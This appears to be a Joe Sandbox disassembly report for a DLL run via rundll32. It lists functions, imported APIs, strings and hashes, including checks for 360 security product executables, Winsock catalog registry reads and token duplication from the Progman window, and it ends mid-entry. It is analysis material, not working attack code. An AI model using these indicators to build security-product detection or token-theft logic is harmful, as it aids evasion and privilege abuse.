Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: AddressProc$HandleModuleOpenProcess$CloseFileName$CombineFreePathStringmemset
String ID: Kernel32.dll$QueryFullProcessImageNameW
API String ID: 930578061-1170590071
Opcode ID: 21058d059558c167eb128ecc070ccb7a1d86f5313822a2293c00ae13ac054d8f
Instruction ID: 54324c73b988387a6f6bb080a4d890c873d93734858c8758c4fce1d00ab0755c
Opcode Fuzzy Hash: 21058d059558c167eb128ecc070ccb7a1d86f5313822a2293c00ae13ac054d8f
Instruction Fuzzy Hash: AD418231B01F089AE751CBA2EC04BDD72A2BB4DBD4F548524EE69637A4DF388619C344

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800433EC Relevance: 18.2, APIs: 12, Instructions: 182COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 0000000180043445
_time64.MSVCRT ref: 000000018004344C
srand.MSVCRT ref: 0000000180043455
rand.MSVCRT ref: 0000000180043463
memset.MSVCRT ref: 0000000180043547
memmove.MSVCRT ref: 000000018004355D
memmove.MSVCRT ref: 00000001800435AA
??_V@YAXPEAX@Z.MSVCRT ref: 00000001800435D1
??_V@YAXPEAX@Z.MSVCRT ref: 0000000180043603
memmove.MSVCRT ref: 0000000180043644
memmove.MSVCRT ref: 000000018004365A
??_V@YAXPEAX@Z.MSVCRT ref: 0000000180043678

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: memmove$_time64memsetrandsrand
String ID:
API String ID: 532172381-0
Opcode ID: 6ebde1e15a5daa3d485701c01873e90b9359cc9e4f17f74e3b8bc65d2ffc7e04
Instruction ID: 3d32fb05b4f0e0362b7b9cd0aaa418761e9398a752506ae5bdaf1bf6c7f8014f
Opcode Fuzzy Hash: 6ebde1e15a5daa3d485701c01873e90b9359cc9e4f17f74e3b8bc65d2ffc7e04
Instruction Fuzzy Hash: 2281CF72200F8886EB95DB15E8813DA73A5FB8C7D8F119125EA9A03BA4DF38C64DC740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180078A30 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 197COMMON

Download Yara Rule

APIs

__C_specific_handler.MSVCRT ref: 0000000180078A39
?terminate@@YAXXZ.MSVCRT ref: 0000000180078A58
abort.MSVCRT ref: 0000000180078A72
_errno.MSVCRT ref: 0000000180078AAA
_errno.MSVCRT ref: 0000000180078B26
iswctype.MSVCRT ref: 0000000180078BF5
_errno.MSVCRT ref: 0000000180078C8D
free.MSVCRT ref: 0000000180078C9D

Strings

csm, xrefs: 0000000180078A45
f, xrefs: 0000000180078A3F

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: _errno$?terminate@@C_specific_handlerabortfreeiswctype
String ID: csm$f
API String ID: 3008409500-629598281
Opcode ID: cb4ff8b5ebe89d3986471470a6de958979d9adc1f1dde0f1a6724a9577e23cc3
Instruction ID: 7b0f8dd17277ba6112c52f93bbbd1643d611d3ff89c652db72cc518acb6e3753
Opcode Fuzzy Hash: cb4ff8b5ebe89d3986471470a6de958979d9adc1f1dde0f1a6724a9577e23cc3
Instruction Fuzzy Hash: 1D819172781B0889FBA6DFA490503EC23E0EF4C7D8F048515FA5917BC9DE3A8A599321

Uniqueness

Uniqueness Score: -1.00%

Function 000000018004A39C Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 158COMMON

Download Yara Rule

APIs

FindWindowW.USER32 ref: 000000018004A3C8
SetForegroundWindow.USER32 ref: 000000018004A3DB
wcsstr.MSVCRT ref: 000000018004A3FC
memset.MSVCRT ref: 000000018004A46F
ShellExecuteW.SHELL32 ref: 000000018004A5FC

Part of subcall function 00000001800495A4: GetTickCount.KERNEL32 ref: 00000001800495AC
Part of subcall function 00000001800495A4: srand.MSVCRT ref: 00000001800495B4
Part of subcall function 00000001800495A4: GetCurrentProcessId.KERNEL32 ref: 00000001800495BA
Part of subcall function 00000001800495A4: GetCurrentProcessId.KERNEL32 ref: 00000001800495CE
Part of subcall function 00000001800495A4: ??_U@YAPEAX_K@Z.MSVCRT ref: 00000001800495FA
Part of subcall function 00000001800495A4: GetTokenInformation.ADVAPI32 ref: 0000000180049629
Part of subcall function 00000001800495A4: GetSidSubAuthorityCount.ADVAPI32 ref: 0000000180049636
Part of subcall function 00000001800495A4: GetLastError.KERNEL32 ref: 000000018004963F
Part of subcall function 00000001800495A4: GetSidSubAuthority.ADVAPI32 ref: 0000000180049658
Part of subcall function 00000001800495A4: ??_V@YAXPEAX@Z.MSVCRT ref: 000000018004967B

Part of subcall function 00000001800494C4: ??_U@YAPEAX_K@Z.MSVCRT ref: 00000001800494DA

Part of subcall function 000000018004AF08: ShellExecuteW.SHELL32 ref: 000000018004AF73

Part of subcall function 0000000180049798: CoInitialize.OLE32 ref: 00000001800497D2
Part of subcall function 0000000180049798: CoCreateInstance.OLE32 ref: 0000000180049805
Part of subcall function 0000000180049798: IUnknown_QueryService.SHLWAPI ref: 0000000180049897

Strings

Progman, xrefs: 000000018004A3C1
p, xrefs: 000000018004A45C
open, xrefs: 000000018004A47A, 000000018004A53B, 000000018004A5F3
Program manager, xrefs: 000000018004A3BA
http://, xrefs: 000000018004A42C

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: AuthorityCountCurrentExecuteProcessShellWindow$CreateErrorFindForegroundInformationInitializeInstanceLastQueryServiceTickTokenUnknown_memsetsrandwcsstr
String ID: Progman$Program manager$http://$open$p
API String ID: 1516062321-2122229248
Opcode ID: 58ac5753a69af218fee8d4caaaed4576b5dee7a80132d74c2a967a22724bbafe
Instruction ID: 5854d287d17234f5949c9620cb83c855c738d658d9246579e802d6f7b8ceff8d
Opcode Fuzzy Hash: 58ac5753a69af218fee8d4caaaed4576b5dee7a80132d74c2a967a22724bbafe
Instruction Fuzzy Hash: A971A672209F8981FBA19B29D4913DE7360F7C97F4F058326BA6942AD5DF38C648C744

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180056400 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 142registryCOMMON

Download Yara Rule

APIs

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

memset.MSVCRT ref: 00000001800564A0

Part of subcall function 0000000180057364: RegQueryValueExW.ADVAPI32 ref: 00000001800573A9

RegCloseKey.ADVAPI32 ref: 00000001800564F2
memset.MSVCRT ref: 0000000180056572
GetModuleFileNameW.KERNEL32 ref: 0000000180056589
PathAppendW.SHLWAPI ref: 00000001800565AD
_wcsicmp.MSVCRT ref: 00000001800565C8
PathAppendW.SHLWAPI ref: 00000001800565DE

Part of subcall function 000000018000892C: GetModuleHandleW.KERNEL32 ref: 0000000180008966
Part of subcall function 000000018000892C: GetProcAddress.KERNEL32 ref: 000000018000897B
Part of subcall function 000000018000892C: RegCloseKey.ADVAPI32 ref: 00000001800089E0

PathFileExistsW.SHLWAPI ref: 00000001800565FA

Strings

safemon\360EDRSensor.exe, xrefs: 00000001800565D2
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360EDRSensor.exe, xrefs: 0000000180056477

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: Path$AppendCloseFileModulememset$AddressExistsHandleHeapNameProcProcessQueryValue_wcsicmp
String ID: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360EDRSensor.exe$safemon\360EDRSensor.exe
API String ID: 1838183957-848848004
Opcode ID: 53d40d4281f59d1785bb74b81d44e61fae45e923a74e0e4f630338c30aea0692
Instruction ID: 12369466515329e4b94078003e01a8293ee627d21bf6a1b54a8e48e621231722
Opcode Fuzzy Hash: 53d40d4281f59d1785bb74b81d44e61fae45e923a74e0e4f630338c30aea0692
Instruction Fuzzy Hash: F9617132614A4886EBA1DF25E8543DA73A4FB8C7E4F408215BAAD437E5DF39C749CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000018005619C Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 141registryCOMMON

Download Yara Rule

APIs

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

memset.MSVCRT ref: 000000018005623C

Part of subcall function 0000000180057364: RegQueryValueExW.ADVAPI32 ref: 00000001800573A9

RegCloseKey.ADVAPI32 ref: 000000018005628E
memset.MSVCRT ref: 000000018005630E
GetModuleFileNameW.KERNEL32 ref: 0000000180056325
PathAppendW.SHLWAPI ref: 0000000180056349
_wcsicmp.MSVCRT ref: 0000000180056364
PathAppendW.SHLWAPI ref: 000000018005637A

Part of subcall function 000000018000892C: GetModuleHandleW.KERNEL32 ref: 0000000180008966
Part of subcall function 000000018000892C: GetProcAddress.KERNEL32 ref: 000000018000897B
Part of subcall function 000000018000892C: RegCloseKey.ADVAPI32 ref: 00000001800089E0

PathFileExistsW.SHLWAPI ref: 0000000180056396

Strings

safemon\360ExtHost.exe, xrefs: 000000018005636E
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360ExtHost.exe, xrefs: 0000000180056213

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: Path$AppendCloseFileModulememset$AddressExistsHandleHeapNameProcProcessQueryValue_wcsicmp
String ID: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360ExtHost.exe$safemon\360ExtHost.exe
API String ID: 1838183957-351904165
Opcode ID: 1e39c5d7731f9f0cfe2357af418d2a02b58939d64fc7587de7a383dead0b9532
Instruction ID: 01aece9f02afbb37390a2111cb2c5fee408a8cfe5dec439bdff79febd640f7a5
Opcode Fuzzy Hash: 1e39c5d7731f9f0cfe2357af418d2a02b58939d64fc7587de7a383dead0b9532
Instruction Fuzzy Hash: 27615132614A4892EBA1DB25E8543DA73A4FB8C7E4F448315BAAD436F5DF39C749CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000018005B708 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 99COMMON

Download Yara Rule

APIs

_time64.MSVCRT ref: 000000018005B72D

Strings

360Ent, xrefs: 000000018005B7A8
ForceNoPopup, xrefs: 000000018005B805

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: _time64
String ID: 360Ent$ForceNoPopup
API String ID: 1670930206-2160763818
Opcode ID: 3df8c11bbac872115ce6f895ee47564cdc6bd6ec8b8168957dd4759c0a914245
Instruction ID: 01ea4ee26c0475092520961f9a9bd5e8ca1980a4bc00605aab446d8ce5817636
Opcode Fuzzy Hash: 3df8c11bbac872115ce6f895ee47564cdc6bd6ec8b8168957dd4759c0a914245
Instruction Fuzzy Hash: FB419D32600B48CAEB928F35D8947DC37A4F74CBE8F04A215FA5A57AA5DF35C699C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180052160 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 78COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32 ref: 000000018005218D

Part of subcall function 0000000180030EE8: ??3@YAXPEAX@Z.MSVCRT ref: 0000000180030F5A

??3@YAXPEAX@Z.MSVCRT ref: 00000001800521B1
??3@YAXPEAX@Z.MSVCRT ref: 0000000180052230
DeleteCriticalSection.KERNEL32(?,?,?,?,0000000180006BF2), ref: 0000000180052261

Strings

%s\NameSpace_Catalog5\Catalog_Entries64\%012d, xrefs: 0000000180052353
Num_Catalog_Entries64, xrefs: 000000018005233F
SYSTEM\CurrentControlSet\Services\WinSock2\Parameters, xrefs: 00000001800524C4
%s\NameSpace_Catalog5\Catalog_Entries\%012d, xrefs: 000000018005235A, 0000000180052631
SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5, xrefs: 00000001800523AF
Num_Catalog_Entries, xrefs: 0000000180052346

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: ??3@$CriticalDeleteSection
String ID: %s\NameSpace_Catalog5\Catalog_Entries64\%012d$%s\NameSpace_Catalog5\Catalog_Entries\%012d$Num_Catalog_Entries$Num_Catalog_Entries64$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5
API String ID: 1297904149-2676930693
Opcode ID: 3d1b4d4945e0e21b4209534fb7adf2456145591c447b83fcd6c449b0aaaa6bb8
Instruction ID: 73cc0848a655b1fb88aa06a885314cf1e75da9385d723178a5cf1b8a64167aea
Opcode Fuzzy Hash: 3d1b4d4945e0e21b4209534fb7adf2456145591c447b83fcd6c449b0aaaa6bb8
Instruction Fuzzy Hash: F631F232741B4892EF668F25E4443DC63A0F74ABE0F588621EB5C07BA5CF39D5A9C300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180049164 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 61threadCOMMON

Download Yara Rule

APIs

FindWindowW.USER32 ref: 000000018004919D
GetWindowThreadProcessId.USER32 ref: 00000001800491BB
OpenProcess.KERNEL32 ref: 00000001800491D6
OpenProcessToken.ADVAPI32 ref: 00000001800491FB
CloseHandle.KERNEL32 ref: 0000000180049204
DuplicateTokenEx.ADVAPI32 ref: 0000000180049235
CloseHandle.KERNEL32 ref: 000000018004924C
CloseHandle.KERNEL32 ref: 000000018004925E

Strings

Progman, xrefs: 0000000180049196
Program manager, xrefs: 000000018004918F

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: CloseHandleProcess$OpenTokenWindow$DuplicateFindThread
String ID: Progman$Program manager
API String ID: 3967587520-2890643340
Opcode ID: ebbe5ced9ed42ff31fb37c6026852d3e1367768f1ce4ad74df982938cc8d9eb1
Instruction ID: dc0f1755b95b22890c5ec93f314443dee37f8d14911f95f63aa97c4fa7f5c449
Opcode Fuzzy Hash: ebbe5ced9ed42ff31fb37c6026852d3e1367768f1ce4ad74df982938cc8d9eb1
Instruction Fuzzy Hash: 51217F35706B0982EF968B55EC943E563A0FB8C7D4F158125EA5A06BB4DF7CC78C8704

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180019044 Relevance: 16.6, APIs: 11, Instructions: 86libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 000000018001906D
FindResourceW.KERNEL32 ref: 0000000180019085
SizeofResource.KERNEL32 ref: 0000000180019099
LoadResource.KERNEL32 ref: 00000001800190A8
LockResource.KERNEL32 ref: 00000001800190B9
malloc.MSVCRT ref: 00000001800190CA
memmove.MSVCRT ref: 00000001800190E1
FreeResource.KERNEL32 ref: 00000001800190E9
FreeLibrary.KERNEL32 ref: 00000001800190F2
VerQueryValueW.VERSION ref: 000000018001911A
free.MSVCRT ref: 000000018001913F

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: Resource$FreeLibraryLoad$FindLockQuerySizeofValuefreemallocmemmove
String ID:
API String ID: 3317409091-0
Opcode ID: c78e14dcb0124c7fdfddeb6e32502328b3625422cacc1ce2de84f055e235b1f2
Instruction ID: 7be624b5aba991f8dce8e488531e7c4bc30f0810fde0e2206e2c198a200c07cc
Opcode Fuzzy Hash: c78e14dcb0124c7fdfddeb6e32502328b3625422cacc1ce2de84f055e235b1f2
Instruction Fuzzy Hash: F5316D31702B448AEB87DF6AA84479977E0BB4CFD4F098425AE0907764EF38D64AC700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018003F070 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 000000018003F0F4
memset.MSVCRT ref: 000000018003F111
memset.MSVCRT ref: 000000018003F126
SHEnumValueW.SHLWAPI ref: 000000018003F15C
SHGetValueW.SHLWAPI ref: 000000018003F1BF
RegCloseKey.ADVAPI32 ref: 000000018003F29C

Strings

stat, xrefs: 000000018003F0B9

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: Valuememset$CloseEnumOpen
String ID: stat
API String ID: 3313869694-548994849
Opcode ID: 021697519deb37d11cec93fa9a5ab951d19f885d93b4615a5ee70ee1a279cb79
Instruction ID: bca1fd9f3236c41ce4b8b5e5b78ce057e793223580287a74ffbbd9e6a5e702b7
Opcode Fuzzy Hash: 021697519deb37d11cec93fa9a5ab951d19f885d93b4615a5ee70ee1a279cb79
Instruction Fuzzy Hash: 4E616076614A8896D7A2CF25E4403DB77A4F7897D4F518216EB9C43BA8DF39C609CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000018004F30C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 91libraryloaderCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 000000018004F357
LeaveCriticalSection.KERNEL32 ref: 000000018004F36D
LeaveCriticalSection.KERNEL32 ref: 000000018004F3A4
EnterCriticalSection.KERNEL32 ref: 000000018004F3DF
LeaveCriticalSection.KERNEL32 ref: 000000018004F421
GetModuleHandleW.KERNEL32 ref: 000000018004F42E
GetProcAddress.KERNEL32 ref: 000000018004F43E

Strings

kernel32, xrefs: 000000018004F427
Wow64DisableWow64FsRedirection, xrefs: 000000018004F437

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$AddressHandleModuleProc
String ID: Wow64DisableWow64FsRedirection$kernel32
API String ID: 3224368425-736604160
Opcode ID: 1457c0c9fb358b3df7ed4e4eb8243274f5e99d83ec7a1bfee8148cfe039d852a
Instruction ID: ca62fe759e79ebbdf2345efd4774dc097ba4c8a46a0d6040fd790858b76b97b2
Opcode Fuzzy Hash: 1457c0c9fb358b3df7ed4e4eb8243274f5e99d83ec7a1bfee8148cfe039d852a
Instruction Fuzzy Hash: 2D418D31701A4896FA929F21AD843E933A0F748BE9F05C524E96A033A1CF38C79AC304

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001284 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 57libraryloaderCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0000000180001295
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00000001800012A3
GetLastError.KERNEL32 ref: 00000001800012AD
GetProcAddress.KERNEL32 ref: 0000000180001300
GetProcAddress.KERNEL32 ref: 0000000180001317
FreeLibrary.KERNEL32 ref: 0000000180001353

Strings

Wow64RevertWow64FsRedirection, xrefs: 0000000180001306
Kernel32.dll, xrefs: 00000001800012E2
Wow64DisableWow64FsRedirection, xrefs: 00000001800012F6

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: AddressProc$CountCriticalErrorFreeInitializeLastLibrarySectionSpinmemset
String ID: Kernel32.dll$Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection
API String ID: 1208898459-1575494070
Opcode ID: 6febbc95fee42d1cf0ff652153e2663ec320583e122b5040a2f8e94a135876e8
Instruction ID: 73cde57fb6ccd56217924bcb925c7755019b6deb3a189e6d0e2bebe9dd713bb9
Opcode Fuzzy Hash: 6febbc95fee42d1cf0ff652153e2663ec320583e122b5040a2f8e94a135876e8
Instruction Fuzzy Hash: E1212C30602A0ED5FADBDB55AC543E823A5BF5C7D1F54C125A92A866A0EF28C75D8310

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180028C8C Relevance: 15.2, APIs: 10, Instructions: 235COMMON

Download Yara Rule

APIs

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

StringFromGUID2.OLE32 ref: 0000000180028D17
_wcsupr.MSVCRT ref: 0000000180028D26
StringFromGUID2.OLE32 ref: 0000000180028DCA
_wcsupr.MSVCRT ref: 0000000180028DD8
StringFromGUID2.OLE32 ref: 0000000180028E38
_wcsupr.MSVCRT ref: 0000000180028E4A
StringFromGUID2.OLE32 ref: 0000000180028E84
_wcsupr.MSVCRT ref: 0000000180028E92
StringFromGUID2.OLE32 ref: 0000000180028EC4
_wcsupr.MSVCRT ref: 0000000180028ED5

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: FromString_wcsupr$HeapProcess
String ID:
API String ID: 2249050647-0
